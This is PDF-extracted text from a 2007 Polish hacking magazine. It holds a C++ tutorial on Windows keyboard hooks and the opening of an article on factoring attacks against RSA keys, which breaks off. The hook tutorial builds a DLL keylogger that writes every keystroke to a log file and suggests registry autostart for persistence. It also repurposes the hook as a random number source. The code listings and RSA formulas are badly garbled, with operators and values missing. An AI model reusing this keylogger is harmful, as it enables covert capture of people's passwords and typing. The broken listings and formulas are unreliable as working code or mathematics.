prosty  program  podsłuchujący  na-
ciśnięte klawisze. Program napisze-
my w C++Builderze 6 (ze względu na
darmową wersję Personal dostępną
na  stronie  http://www.borland.pl/

download/personal.shtml),  ale  naj-
ważniejsze  fragmenty  kodu  można
bez  trudu  przenieść  do  Visual  C++
2005 lub do innego środowiska pro-
gramistycznego,  nie  tylko  dla  C++.
W szczególności osoby programują-
ce w Delphi z łatwością mogą prze-
tłumaczyć  poniższe  przykłady  na

Object Pascal. To samo dotyczy Vi-

sual Basica.

Zacznijmy od biblioteki DLL za-

wierającej funkcję zahaczoną. Dla
wygody do tej samej biblioteki doda-
my także funkcje ustawiające i usu-
wające hak. W środowisku C++Bu-

ilder,  z  menu  File/New/Other...  wy-
bieramy pozycję DLL Wizard i klika-
my OK. Pojawi się okno widoczne na
Rysunku  1.  Zgodnie  ze  wzorem  na
rysunku należy ustawić widoczne na
nim opcje. Stworzymy w ten sposób
prosty moduł bez pliku nagłówkowe-
go,  w  którym  poza  sporej  wielkości
komentarzy jest tylko funkcja DllMa-

in. Zapiszmy cały projekt używając
np. nazwy KeyHook dla pliku projek-
tu (tj. pliku z rozszerzeniem .bpr).

Zacznijmy od zapisania uchwytu

do bieżącej biblioteki DLL w zmien-
nej globalnej handleDLL. Uchwyt ten
można odczytać ze zmiennej global-
nej HInstance zdefiniowanej w mo-
dule SysInit (aby była dostępna na-
leży zaimportować nagłówek Sy-

sInit.hpp),  ale  jest  to  rozwiązanie
charakterystyczne  dla  C++Buildera.
Dlatego  my  odczytamy  go  z  pierw-
szego argumentu funkcji DllMain. W
tym  celu  modyfikujemy  tę  funkcję,
jak na Listingu 1.

Następnie przejdźmy do zdefinio-

wania  funkcji  SetHook,  której  zada-
niem, jak wskazuje jej nazwa, będzie
ustawienie  haka.  I  tu  ważna  uwaga.
Nie należy jej wywołania umieszczać
w funkcji DllMain, co może wydawać
się  dobrym  rozwiązaniem  automaty-
zującym zakładanie haka. To jest złe
miejsce,  bo  biblioteka  DLL  zawierać
będzie  także  funkcję  zahaczoną,  co
oznacza,  że  biblioteka  będzie  łado-
wana  do  przestrzeni  adresowej  każ-
dej aplikacji, która otrzyma komunikat
związany z naciśnięciem klawiszy. Za
każdym  razem  wywoływana  będzie
oczywiście jej funkcja DllMain.

Ustawienie haka realizowane jest

przez wywołanie funkcji WinAPI Se-

Komunikacja między

aplikacjami a systemem

Windows

Do  komunikacji  między  systemem,  a
aplikacją używa się funkcji także zwrot-
nych,  czyli  funkcji  udostępnianych
przez aplikacje lub biblioteki DLL, któ-
rych nazwa i sygnatura są z góry okre-
ślone i które wywoływane są przez sys-
tem  w  ściśle  określonych  sytuacjach.
Takimi  funkcjami  są  np.  WinMain  lub
DllMain  (ewentualnie  DllEntryPoint)
uruchamiane w momencie uruchomie-
nia aplikacji lub załadowania biblioteki
DLL do pamięci. Do komunikacji inicjo-
wanej  przez  system  są  one  używane
jednak  stosunkowo  rzadko.  Natomiast
do komunikacji w odwrotnym kierunku,
tj. gdy jest ona inicjowana przez aplika-
cję,  korzystanie  z  funkcji  udostępnia-
nych  przez  systemowe  biblioteki  DLL
jest standardem. System udostępnia w
ten sposób ogromny zbiór funkcji, które
tworzą WinAPI tj. interfejs programisty
aplikacji Windows.

W sieci

• http://www.borland.pl/download/

personal.shtml – lista darmowych
wersji narzędzi deweloperskich fir-
my Borland

• ht tp: / / msdn2.microsof t.com

– dokumentacja WinAPI i platformy
.NET. Warto zacząć od wpisania w
polu search hasła hooks.

Dokumentacja funkcji zwrotnej Keybo-
ardProc dostępna jest w MSDN pod
adresem:

• http://msdn.microsoft.com/library/

en-us/winui/winui/windowsus
erinterfacewindowing/hooks/
hookreference/hookfunctions/
keyboardproc.asp. Tę samą stronę
zobaczymy wpisując w Google ha-
sła KeyboardProc MSDN i klikając
pierwszy link.

Rysunek 1.

Ustawienia w kreatorze biblioteki DLL

hakin9 Nr 4/2007

www.hakin9.org

Atak

tWindowsHookEx,  której  pierwszym
argumentem  jest  stała  identyfikująca
typ  interesujących  nas  komunikatów,
w  naszym  przypadku  będzie  to  sta-
ła

WH _ KEYBOARD

, drugim jest wskaźnik

do  funkcji  zahaczonej,  którą  będzie-
my  musieli  jeszcze  zdefiniować,  na-
tomiast trzeci wskazuje uchwyt biblio-
teki,  w  której  funkcja  zahaczona  jest
umieszczona.  W  naszym  przypad-
ku, w którym funkcja ustawiająca hak
i funkcja zahaczona są w tej samej bi-
bliotece  umieścimy  w  trzecim  argu-
mencie uchwyt do bieżącej biblioteki.

Na Listingu 2. widzimy, że zade-

klarowana została zmienna globalna
o nazwie

handleHook

, do której w me-

todzie  SetHook  zapisaliśmy  uchwyt
ustawionego  haka.  Po  wywołaniu
funkcji SetWindowsHookEx informu-
jemy użytkownika o powodzeniu lub
niepowodzeniu ustawienia haka. Ja-
ko  drugi  argument  funkcji  SetWin-

dowsHookEx podaliśmy wskaźnik
do funkcji KeyboardHookProc. Szko-
puł w tym, że ona jeszcze nie istnie-
je. Ale nie wszystko na raz.

Dla porządku zdefiniujmy od razu

funkcję usuwającą hak, przedstawio-
ną na Listingu 3.

Podobnie, jak w przypadku po-

przedniej funkcji, także tu napraw-
dę ważna jest tylko pierwsza linia,
w której wywołujemy funkcję WinAPI

UnhookWindowsHookEx. Pozosta-
łe dwie służą do wyświetlania komu-
nikatu o powodzeniu operacji. Funk-
cja UnhookWindowsHookEx usu-
wa hak identyfikowany na podstawie
uchwytu, który zapisaliśmy w zmien-
nej handleHook.

Obie funkcje należy wyekspor-

tować  z  biblioteki  DLL.  W  tym  ce-
lu  do  ich  sygnatur,  przed  wska-
zaniem  zwracanego  typu  doda-
liśmy  modyfikatory

extern

"C"

_ _ declspec

(dllexport).

Funkcja zahaczona

Wreszcie możemy przejść do zdefinio-
wania funkcji zahaczonej (zdecydowa-
liśmy już, że będzie nazywała się Key-

boardHookProc), która będzie wywo-
ływana, kiedy tylko dotkniemy klawia-
tury. Jej sygnatura jest ściśle określo-
na w dokumentacji WinAPI (zobacz
ramka W sieci). Przyjmuje trzy argu-

menty: code, wParam i lParam. Pierw-
szy  z  nich  informuje  o  tym,  co  funk-
cja zahaczona powinna zrobić z prze-
chwyconym  komunikatem.  Jeżeli  jej
wartość jest mniejsza od zera, komu-
nikat  powinien  zostać  zignorowany.
Możliwe wartości nieujemne to 0 (sta-
ła

HC _ ACTION

) lub 3 (

HC _ NOREMOVE)

. In-

formują o wykryciu komunikatu (po-
równaj opis komunikatów i w MSDN),
a różnią się tym, że w drugim przypad-
ku komunikat nie został jeszcze zdję-
ty z kolejki komunikatów. W przypadku
komunikatów związanych z klawiaturą

wartość code jest niemal zawsze rów-
na 0. Wyjątkiem jest na przykład Mi-
crosoft Word, który w bardziej złożo-
ny sposób obsługuje komunikaty kla-
wiaturowe.  Pozostałe  dwa  argumen-
ty  funkcji  zahaczonej  przekazują  da-
ne  komunikatu.  Parametr  wParam  to
kod znaku naciśniętego klawisza, a w
bitach lParam umieszczone są dodat-
kowe informacje o kontekście, w jakim
naciśnięty  został  klawisz.  Szczegóły
omówię poniżej.

Funkcja zahaczona będzie wywo-

ływana z poziomu aplikacji, do której

Listing 1.

Inicjacja biblioteki DLL

HINSTANCE

handleDLL

NULL

;

#pragma argsused

BOOL

WINAPI

DllMain

(

HINSTANCE

hinstDLL

DWORD

fwdreason

LPVOID

lpvReserved

)

{

(

fwdreason

DLL_PROCESS_ATTACH

)

handleDLL

hinstDLL

;

return

;

}

Listing 2.

Ustawianie haka klawiaturowego

#include

<SysInit.hpp>

HHOOK

handleHook

NULL

;

extern

"C"

__declspec

(

dllexport

)

void

__stdcall

SetHook

(

void

)

{

handleHook

SetWindowsHookEx

(

WH_KEYBOARD

(

HOOKPROC

)

KeyboardHookProc

HInst

ance

NULL

);

(

handleHook

NULL

)

MessageBox

(

NULL

"Założenie haka nie powiodło

się"

"KeyHook"

MB_OK

MB_ICONERROR

);

else

Message

Box

(

NULL

"Założenie haka udało się"

"KeyHook"

MB_OK

MB_ICONINFORMATION

);

}

Rysunek 2.

Przykładowy plik generowany w trakcie podsłuchiwania

klawiatury

hakin9 Nr 4/2007

www.hakin9.org

Atak

ładowana  będzie  nasza  biblioteka,
dlatego  musi  być  wyeksportowana
(stąd modyfikatory w jej sygnaturze).
Aby  uniknąć  dodatkowego  jej  dekla-
rowania funkcję zahaczoną proponu-
ję wstawić przed funkcję SetHook.

W momencie naciśnięcia klawi-

sza  na  klawiaturze  system  generuje
dwa  komunikaty.  Pierwszy,  gdy  kla-
wisz  zostanie  wciśnięty,  drugi  –  gdy
jest  zwalniany.  Widoczny  w  funkcji
warunek  sprawdzający  wartość  31-
go bitu parametru lParam powoduje,
że  w  obu  przypadkach  generowany
jest inny dźwięk (służy do tego funk-
cja  WinAPI  Beep):  wyższy,  gdy  kla-
wisz jest naciskany, i niższy, gdy jest
zwalniany.  Po  zareagowaniu  na  wy-
krycie komunikatu należy jeszcze wy-
wołać funkcję CallNextHookEx, która
powoduje wywołanie następnej funk-
cji  zahaczonej  związanej  z  tym  sa-
mym  typem  komunikatów.  Dzięki  te-
mu  są  one  organizowane  w  swoiste
łańcuchy, z których system wywołuje
pierwszy element, a funkcje zahaczo-
ne dbają o wywołanie następnych.

Na razie funkcja nie zapisuje

jeszcze kodów naciśniętych klawi-
szy, a jedynie uroczo sobie pobrzę-
kuje. To pozwoli nam jednak upew-
nić się, że jest ona rzeczywiście wy-
konywana. Warto również dodać do

DllMain polecenia pokazujące komu-
nikaty informujące o załadowaniu bi-
blioteki do pamięci i jej usunięciu.
Dzięki temu będziemy mogli na wła-
sne oczy przekonać się, że bibliote-
ka jest ładowana do przestrzeni ad-
resowej każdej aplikacji, która otrzy-
ma komunikat o naciśnięciu klawisza
(tzn. która będzie aktywna, gdy bę-
dziemy stukać w klawiaturę).

Aby przetestować działanie naszego
haka bez pisania osobnej aplikacji
możemy użyć następującej komendy
Windows:
rundll32 KeyHook,SetHook.

Po pojawieniu się komunikatu Za-

łożenie  haka  udało  się  nie  klikaj-
my OK, aby uniknąć usunięcia pier-
wotnej instancji biblioteki DLL z pa-
mięci  i  tym  samym  usunięcia  haka.
Wówczas  naciskając  klawisze  po-
winniśmy  usłyszeć  charakterystycz-

ne  brzęczenie  –  znak,  że  nasz  hak
działa. Zauważmy, że wykrywane są
osobno  naciśnięcia  wszystkich  kla-
wiszy,  w  tym  klawiszy  funkcyjnych
oraz klawiszy Ctrl, Shift i Alt.

W dołączonym do artykułu ko-

dzie umieściłem projekt aplikacji,
która pozwala na wygodniejszą kon-
trolę ładowania biblioteki oraz zakła-
dania i zwalniania haka.

Podsłuchiwanie

klawiatury

Teraz dopiero zrobimy się niegrzecz-
ni.  Zmodyfikujemy  bowiem  funkcję
zahaczoną tak, żeby zapisywała do
pliku naciśnięte klawisze. Nie będzie
z  tym  żadnego  kłopotu,  bo  jak  już
wiemy,  informacja  ta  przekazywa-

na jest do funkcji w parametrze wPa-

ram. Wystarczy zapisać ją do pliku.
Najprostsza realizacja tego pomysłu
ukazana została na Litingu 5.

Zwróćmy uwagę, że przechwyty-

wany komunikat nie przekazuje infor-
macji o tym, czy na monitorze poja-
wiła się mała, czy duża litera (ewen-
tualnie czy pojawiła się cyfra, czy je-
den ze znaków !, @, # itd.) Komunikat
przekazuje  tylko  taką  informację,  ja-
ka jest odbierana od klawiatury. Naci-
śnięcie klawiszy Shift i Caps Lock jest
sygnalizowane  osobnymi  komunika-
tami  i  w  funkcji  zahaczonej  ich  na-
ciśnięcie  i  zwolnienie  trzeba  śledzić
samodzielnie. Podobnie jest z klawi-
szem  Ctrl.  Natomiast  w  parametrze

lParam przekazywana jest informa-

Listing 4.

Zdejmowanie haka klawiaturowego, lang=C++

extern

"C"

__declspec

(

dllexport

)

void

__stdcall

RemoveHook

(

void

)

{

bool

result

UnhookWindowsHookEx

(

handleHook

);

(

result

)

MessageBox

(

NULL

"Usunięcie haka udało się"

"KeyHook"

MB_OK

MB_ICONINFORMATION

);

else

MessageBox

(

NULL

"Usunięcie haka nie powiodło się"

"KeyHook"

MB_OK

MB_ICONERROR

);

}

Listing 3.

Funkcja uruchamiana w momencie wykrycia komunikatu

klawiaturowego

extern

"C"

__declspec

(

dllexport

)

LRESULT

CALLBACK

KeyboardHookProc

(

int

code

WPARAM

wParam

LPARAM

lParam

)

{

(

code

HC_ACTION

)

{

((

lParam

0x80000000

)==

)

Beep

(

150

);

else

Beep

(

);

}

return

CallNextHookEx

(

handleHook

code

wParam

lParam

);

}

Rysunek 3.

Gdy na ekranie pojawi się ten komunikat nie klikajmy OK.

Wówczas usłyszymy działanie haka.

Hak na Windows

hakin9 Nr 4/2007

www.hakin9.org

cja o naciśnięciu klawisza Alt, którą
można odczytać z 29-go bita.

Oczywiście prowadzenie prawdzi-

wego  podsłuchu  wymagałoby  zare-
jestrowania  dodatkowych  informacji.
Warto zapisać czas naciśnięcia klawi-
sza (w poniższej metodzie korzystam
z funkcji WinAPI GetTickCount zwra-
cającej  ilość  milisekund  od  momentu
uruchomienia komputera), oczywiście
kod  klawisza,  informację  o  tym,  czy
klawisz  był  naciśnięty,  czy  zwolnio-
ny oraz stan bitów parametru lParam.
Realizuje to wersja funkcji zahaczonej
znajdująca się na Listingu 6.

W dołączonym do artykułu ko-

dzie dostępna jest nieco rozszerzo-
na wersja metody KeyboardHook-

Proc, która na bieżąco wyświetla do-
datkowe informacje na ekranie.

Jak widać ustawianie globalne-

go haka nie jest specjalnie trudne.
Moc tego mechanizmu jest przy tym
ogromna. Pozwala on aplikacjom

trzecim  na  monitorowanie  i  kontrolę
komunikacji między systemem, a uru-
chomionymi w nim aplikacjami. Dzia-
łanie haka jest wprawdzie ograniczo-
ne  do  jednego  użytkownika,  ale  wy-
starczy  umieścić  odpowiedni  wpis  w
rejestrze,  aby  aplikacja  zakładająca
hak uruchamiana była przy logowaniu
każdego  użytkownika.  Jeszcze  wy-
godniejsze, i dające dodatkowe moż-
liwości,  byłoby  przygotowanie  usługi
uruchamianej przy starcie systemu.

Haki nie służą

tylko do hackowania

Mechanizm haków nie został oczywi-
ście  zaprojektowany  przez  programi-
stów  Microsoft  po  to,  żeby  możliwe
było  szpiegowanie  komputerów  kon-
trolowanych  przez  system  Windows.
Ich zadania mogą być bardzo różno-
rodne:  od  przygotowywania  aplikacji
instruktażowych,  w  których  czynno-
ści  użytkownika  mogą  być  śledzone
przez program-nauczyciel, po progra-
mowanie  debugerów  zintegrowanych
ze  środowiskami  programistycznymi.
Nawet  przygotowane  przez  nas  na
początku  sygnalizowanie  naciśnięcia
klawisza dźwiękiem, to dobry przykład
praktycznego wykorzystania haka. Ta-
kie potwierdzenie naciśnięcia klawisza
może być bardzo pożyteczne choćby

w przypadku osób niepełnosprawnych
korzystających z komputera.

Natomiast osoby zajmujące się

bezpieczeństwem komputerów mogą
zainteresować  się  innym  zastosowa-
niem haka klawiaturowego. Z punktu
widzenia kryptografii nieocenione by-
łoby dostępne w systemach kompute-
rowych  źródło  prawdziwych  liczb  lo-
sowych.  Ponieważ  jedynym  kompo-
nentem tych systemów, który nie jest
w  pełni  deterministyczny,  jest  czło-
wiek.  Tylko  użytkownicy  komputerów
mogą stanowić źródło przypadkowo-
ści. Skupmy się na jednym z kanałów,
którym  użytkownik  ingeruje  w  pracę
systemu,  a  mianowicie  na  klawiatu-
rze. A gdybyśmy za pomocą naszego

haka  monitorowali  naciskanie  klawi-
szy, oczywiście nie wybierane klawi-
sze, ale czas ich naciskania lub zwal-
niania? W końcu żaden człowiek nie
jest w stanie kontrolować co do mili-
sekundy momentu, w którym naciska
klawisze. Możemy więc uznać, ostat-
nią cyfrę ilości milisekund od urucho-
mienia komputera do momentu naci-
śnięcia  klawisza  jako  zupełnie  przy-
padkową.  I  to  nie  pseudolosową,  a
rzeczywiście  losową.  Co  zabawne
nie  musimy  wiele  modyfikować  na-
szej  funkcji  zahaczonej.  Wystarczy
zmienić  parametr  zapisywany  do  pli-
ku. Prezentuje to Listing 7.

Tym razem reagujemy tylko na te

komunikaty, w przypadku których pa-

Listing 5.

W tej wersji rejestrowane są tylko naciśnięte klawisze, żadne

informacje dodatkowe. Ułatwia to odczytanie tekstu z pliku, ale utrudnia

śledzenie modyfikatorów

#include

<fstream.h>

extern

"C"

__declspec

(

dllexport

)

LRESULT

CALLBACK

KeyboardHookProc

(

int

code

WPARAM

wParam

LPARAM

lParam

)

{

(

code

HC_ACTION

)

{

((

lParam

0x80000000

)==

)

{

ofstream

txt

(

"C:

keybug.log"

ios

app

);

(

wParam

127

)

txt

(

char

)

wParam

;

else

txt

"["

wParam

"]"

;

txt

();

}
}

return

CallNextHookEx

(

handleHook

code

wParam

lParam

);

}

Rysunek 4.

Ilość losowych cyfr wygenerowanych przez powyższy program

zależy od stopnia użycia klawiatury

hakin9 Nr 4/2007

www.hakin9.org

Atak

rametr code jest równy HC_ACTION.
Unikamy  w  ten  sposób  zapisywania
liczby  losowej  w przypadku,  gdy  ko-
munikat  nie  został  zdjęty  z  kolejki  –
wywołanie  funkcji  jest  wówczas  po-
wtórnie generowane przez komputer
po stałym czasie (z taką sytuacją ma-
my do czynienia na przykład w przy-
padku niektórych aplikacji np. kompo-
nentów Microsoft Office).

Powyższa funkcja spowoduje, że

w  pliku  random.txt  przyrastać  będzie
zbiór  losowych  cyfr,  za  pomocą  któ-
rego  można  utworzyć  losowe  liczby.

W przypadku pojedynczego użytkow-
nika, szczególnie preferującego mysz-
kę, zbiór nie będzie rósł na tyle szyb-
ko, aby mógł być profesjonalnie wyko-
rzystany,    jeżeli  jednak  hak  ustawia-
ny  będzie  automatycznie  po  zalogo-
waniu  każdego  użytkownika  w  ser-
werze, a dodatkowo monitorować bę-
dziemy także inne kanały komunikacji
między użytkownikiem a komputerem,
w szczególności ruch myszki, to efekt
może być całkiem zadowalający.

Na CD dołączonym do tego nu-

meru jest wersja kodu, która nie tylko
zapisuje, ale również odczytuje cyfry
z pliku. Realizuje to klasa QueueFile,
która usuwa raz użyte cyfry. Ponad-
to dostępna jest tam funkcja, która z
dziesięciu cyfr tworzy 32-bitową do-
datnią liczbę całkowitą (unsigned int).

Wspominając o możliwościach

profesjonalnego wykorzystania mu-
szę zastrzec, że powyższe rozwiąza-
nie, choć wygląda na takie, które mu-

si działać powinno być uważnie prze-
testowane. Można to jednak zrobić do-
piero mając ogromny magazyn liczb lo-
sowych. Do testów należy użyć jedne-
go z testerów generatorów liczb pseu-
dolosowych. Ustaloną renomę ma na
przykład Diehard Battery of Tests (http:

//www.stat.fsu.edu/pub/diehard/). Je-
go autor przetestował, poza dużą licz-
bą generatorów liczb pseudolosowych,
także kilka generatorów liczb losowych
korzystających z urządzeń fizycznych.
Żaden z tych ostatnich nie zaliczył
sprawdzianu. Ciekaw jestem, czy nasz

ludzki generator będzie w tym lepszy.
O wynikach postaram się powiadomić
jak tylko uzbieram wystarczającą ilość
liczb. l

O autorze

Fizyk zajmujący się na co dzień optyką kwantową i układami nieuporządkowanymi
na Wydziale Fizyki, Astronomii i Informatyki Stosowanej Uniwersytetu Mikołaja Ko-
pernika w Toruniu.

Jego specjalnością są symulacje ewolucji układów kwantowych oddziaływują-

cych z silnym światłem lasera.

Od 1998 interesuje się programowaniem dla systemu Windows, w szczególno-

ści w środowisku Borland C++Builder. Ostatnio zainteresowany platformą .NET i ję-
zykiem C#.

Wierny użytkownik kupionego w połowie lat osiemdziesiątych "komputera osobi-

stego" ZX Spectrum 48k.

Kontakt z autorem: jacek@fizyka.umk.pl

Listing 6.

Zapisywanie całego kontekstu naciśniętego klawisza,

lang=C++

extern

"C"

__declspec

(

dllexport

)

LRESULT

CALLBACK

KeyboardHookProc

(

int

code

WPARAM

wParam

LPARAM

lParam

)

{

(

code

HC_ACTION

)

{

char

wParam

;

char

kod

[

];

itoa

(

kod

);

char

lParam_bits

[

];

itoa

(

lParam

lParam_bits

);

//zapis do pliku

ofstream

txt

(

"C:

keybug.log"

ios

app

);

txt

GetTickCount

()

": "

;

(

wParam

127

)

{

((

lParam

0x20000000

)==

0x20000000

)

txt

"Alt+"

;

txt

(

char

)

wParam

;

}

else

txt

"["

wParam

"]"

;

txt

" "

(((

lParam

0x80000000

)==

)

"(wciśnięty)"

"(zwolniony)"

);

txt

" ("

wParam

") "

lParam_bits

;

txt

();

}

return

CallNextHookEx

(

handleHook

code

wParam

lParam

);

}

Listing 7.

Prosty generator liczb losowych, lang=C++

extern

"C"

__declspec

(

dllexport

)

LRESULT

CALLBACK

KeyboardHookProc

(

int

code

WPARAM

wParam

LPARAM

lParam

)

{

(

code

HC_ACTION

)

{

((

lParam

0x80000000

)==

)

{

long

GetTickCount

();

short

digit

);

ofstream

txt

(

"c:

random.txt"

ios

app

);

txt

digit

;

txt

();

}
{

return

CallNextHookEx

(

handleHook

code

wParam

lParam

);

}

www.hakin9.org

hakin9 Nr 4/2007

Atak

tym artykule zagłębimy się w sposób
działania RSA i możliwości przepro-
wadzenia ataków faktoryzacyjnych

na niego. Przedstawimy, jak klucze RSA i pro-
cedury ataku mogą zostać użyte do otrzyma-
nia klucza prywatnego za pomocą klucza pu-
blicznego.

Do pełnego zrozumienia artykułu niezbęd-

na będzie podstawowa znajomość programo-
wania w C oraz znajomość podstaw matema-
tyki. W tabeli referencji znajdziesz pomocny w
zrozumieniu artykułu materiał.

Wszystkie przykłady zostały stworzone i

przetestowane na systemie GNU/Linux.

Kryptografia

klucza publicznego

W  przeciwieństwie  do  kryptografii  klucza  pry-
watnego,  gdzie  w  celu  zaszyfrowania  i  zde-
szyfrowania  wiadomości  używany  jest  poje-
dyńczy klucz, kryptografia klucza publicznego
składa się z dwóch kluczy. Nazywane one są
kluczem  prywatnym  i  publicznym.  Aby  zaszy-
frować wiadomość, użytkownik potrzebuje każ-
dego z nich. Podczas, gdy prywatny klucz musi
być utajniony, publiczny jest dostępny dla każ-
dego, kto chce wysłać zaszyfrowane wiadomo-

ści do użytkownika. Wiadomość zakodowana
kluczem publicznym może zostać rozkodowa-
na odpowiednim kluczem prywatnym. Aby taka
sytuacja była możliwa, musimy przeanalizować
kilka matematycznych problemów. W tym celu
używa się właśnie faktoryzacji wielkich liczb.

Początki kryptografii kluczy publicznych

związane są z publikacją Diffie'a i Hellmana z ro-
ku 1976. Rok później Rivest, Shamir i Adleman
zaproponowali kryptosystem RSA, najczęściej
stosowany obecnie system kryptograficzny.

W 1997 roku dokumenty kryptografów z

British Government Group for the Security of
Electronic Communications (GSEC) ukaza-
ły, że ta metoda kryptografii była już znana w
1973 roku.

Atak faktoryzacyjny

na RSA

Daniel Lerch Hostalot

stopień trudności

RSA to bez wątpienia najpopularniejszy system publicznej

kryptografii pozostający w użyciu, który przetrwał wnikliwe testy

kryptoanalityków trwające już ponad ćwierć wieku.

Bezpieczeństwo tego popularnego algorytmu jest oparte o

trudności związane z faktoryzacją dużych liczb, czyli tych, które

mają ponad 100 cyfr w zapisie dziesiętnym.

Czego się nauczysz…

• jak działa RSA;
• jak przeprowadzać ataki faktoryzacyjne.

Powinieneś wiedzieć…

• jakie są podstawy programowania w C.

Atak faktoryzacyjny na RSA

hakin9 Nr 4/2007

www.hakin9.org

Kryptosystem RSA

Jak  wspomnieliśmy  wcześniej,  bez-
pieczeństwo RSA opiera się na trud-
nościach związanych z procedurami
obliczeniowymi  faktoryzacji  wielkich
liczb.  Faktoryzacja  liczby  oznacza
znalezienie  liczb  pierwszych  (fakto-
rów), które, pomnożone przez siebie,
dają tę właśnie liczbę. Jeśli, na przy-
kład,  chcemy  sfaktoryzować  liczbę
12,  otrzymamy  w  rezultacie  2·2·3.
Najprostszy sposób znalezienia fak-
torów liczby n polega na podzieleniu
jej  przez  wszystkie  liczby  pierwsze
mniejsze  od  niej  samej.  Ta  proce-
dura, mimo że koncepcjonalnie pro-
sta, jest bardzo powolna w przypad-
ku faktoryzacji wielkich liczb.

Wykonajmy kilka kalkulacji dla

przykładu. Klucz o 256 bitach (któ-
ry później złamiemy) ma około 78

dziesiętnych  cyfr  (1078).  Jak  poka-
zują klucze RSA, taka liczba ma za-
zwyczaj tylko dwa pierwsze faktory,
każdy z nich posiada około 39 cyfr.
To  oznacza,  że  aby  sfaktoryzować
liczbę, będziemy musieli podzielić ją
przez wszystkie liczby pierwsze o 39
lub mniej cyfrach (1039). Zakładając,
że jedynie 0.1% liczb to liczby pierw-
sze,  wykonamy  około  1036  działań
podziału.  Załóżmy,  że  mamy  sys-
tem, mogący wykonać 1020 dzieleń
w  ciągu  sekundy.  W  tym  wypadku,
złamanie  klucza  zajmie  nam  1016
sekund. Innymi słowy, więcej niż 300
milionów  lat,  milion  razy  więcej,  niż
wiek  Wszechświata.  Na  szczęście,
jest też inny sposób.

Przypatrzmy się, jak działa RSA.

Najpierw wygenerujemy klucz publicz-
ny i prywatny (w tabelce obok znajdzie-

my kilka interesujących matematycz-
nych koncepcji). Aby tego dokonać,
musimy wykonać następujące kroki:

Krok 1:

Losowo  wybieramy  dwie  liczby
pierwsze  p  i  q.  Mnożymy  je  przez
siebie,  otrzymując  n:

. Jeśli

przyjmiemy, dla przykładu, że
oraz

, otrzymamy

Krok 2:

Obliczamy wskaźnik Eulera (Totien-
ta), przy pomocy następującej for-
m u ł y :

W naszym przypadku otrzymamy

Krok 3:

Znajdujemy  wykładnik  potęgowy  do
szyfrowania  (później  użyjemy  go
przy  szyfrowaniu),  nazywamy  go  e.
Ta  liczba  musi  być  kompatybilna  z

Dobrym przykładem

może być:

, ponieważ nie po-

siada żadnego faktora z 20 (fakto-
ry 2 i 5).

Krok 4:

Obliczamy  wykładnik  potęgowy
do  deszyfrowania,  nazywamy  go
d  (później  wykorzystamy  go  przy
rozszyfrowywaniu).  Ta  liczba  mu-
si  być  zgodna  z

, a więc

. Oznacza to, że d

będzie liczbą z przedziału od 1 do
20, która pomnożona przez 3 i po-
dzielona przez 20 da 1. d może więc
wynosić 7.

Klucze:

Klucz publiczny użytkownika należy
do pary (n, e), w naszym przypadku
(33, 3), zaś klucz prywatny to d, czy-
li 7. Oczywiście, liczby p, q oraz

powinny pozostać ukryte.

(De)szyfrowanie:

Na tym etapie, wystarczy nam za-
szyfrowanie za pomocą

oraz deszyfrowanie przy pomocy

. Jeśli przyjmiemy, że

nasza wiadomość to

, odpo-

wiadające szyfrowanie będzie mia-
ło postać

. Aby zde-

szyfrować wiadomość, wystarczy
wykonać

Koncepcje matematyczne

Dzielnik lub Faktor: Liczba całkowita jest dzielnikiem (lub faktorem) liczby , gdy ist-
nieje inna liczba całkowita , która jest zgodna z

Na przykład:

Liczby pierwsze i złożone

Liczba całkowita jest pierwszą, jeśli może być podzielona jedynie przez jedynkę i

samą siebie. Liczba całkowita jest złożoną, jeśli nie jest liczbą pierwszą.

Na przykład:

jest liczbą złożoną, 7 i 3 są liczbami pierwszymi.

Faktoryzacja

Faktoryzacja liczby całkowitej jest procesem podziału jej na dwa pierwsze fak-

tory:

, gdzie są liczbami pierwszymi i są dodatnimi liczbami całko

witymi.

Przykład: 84 jest faktoryzowalna jako

Modulo

Modulo definiujemy i oznaczamy jako

resztę z całkowitego dzielenia

przez .

Na przykład:

a i b są modulo od n:

jeśli ich różnica (a-b) jest wielokrotnością n.

Największy Wspólny Dzielnik

Największym wspólnym dzielnikiem dwóch liczb całkowitych i , reprezentowa-

nym jako

, większą liczbę całkowitą, która spełnia dzielenie i .

Na przykład:

Algorytm Euklidesa:

Algorytm Euklidesa oblicza największy wspólny dzielnik dwóch liczb w oparciu o

, gdzie

są całkowite i jest resztą z dzielenia i

Na przykład:

(1)
(2)
(3)

Wskaźnik Eulera (Totienta):

Mając

wiemy, że

to ilość liczb całkowitych z przedziału

, które są pierwszymi* z . Dla

*Dwie liczby całkowite i są pierwszymi względem siebie (lub relatywnie

pierwsze), jeśli

hakin9 Nr 4/2007

www.hakin9.org

Atak

Jak wspomnieliśmy na początku,

i jak widać z powyższych procedur,
zabezpieczenie kryptosystemu opie-
ra się na liczbie n. Oznacza to, że je-
śli atakujący, mający dostęp do klu-
cza publicznego, zdoła sfaktoryzo-
wać n, otrzymując p i q, będzie mu-
siał jedynie użyć powyższych formuł,
by otrzymać klucz prywatny.

Wyzwanie

Faktoryzowania RSA

Wyzwanie  Faktoryzowania  RSA
to  konkurs,  finansowany  przez  La-
boratoria  RSA,  w  którym  pokaź-
ne  nagrody  przyznawane  są  tym,
którzy  zdołają  sfaktoryzować  pew-
ne  bardzo  wielkie  liczby.  Dzięki  te-
mu,  stan  bezpieczeństwa  RSA  jest
ciągle monitorowany – w przypadku
złamania  klucza,  jego  długość  jest
zwiększana.

W momencie pisania artykułu,

rekord faktoryzacji wynosi RSA-640,
liczba  o  193  cyfrach,  która  zosta-
ła sfaktoryzowana 2 listopada 2005
przez  F.  Bahra.  Kolejnym  wyzwa-
niem jest RSA-704, za złamanie któ-
rego  przyznana  zostanie  nagroda
$30.000.

Bez wątpienia, Wyzwanie Fakto-

ryzowania RSA jest świetnym spo-
sobem na poznanie obecnej sytuacji
bezpieczeństwa systemów opartych
o faktoryzację.

Aktualne wyzwania zostały ze-

brane w tabeli, zamieszczonej na
końcu tego artykułu.

Atak faktoryzacyjny

W  dalszej  części  artykułu  przepro-
wadzimy przykładowy atak na klucz
RSA.  W  celu  oszczędzenia  czasu
wymaganego  na  obliczenia,  użyje-
my klucza dużo krótszego, niż zwy-
czajowo, upraszczając faktoryzację.
Mimo, że nie jest to przykład z życia
wzięty, prezentuje, jak można w peł-
ni wykonać atak.

Najpierw stworzymy środowisko

do pracy z OpenSSL, generując nie-
zbędne klucze oraz szyfrując wiado-
mość, której użyjemy jako cel nasze-
go ataku. Później, sfaktoryzujemy
modulo n, otrzymując klucz prywat-
ny, który posłuży nam do zdeszyfro-
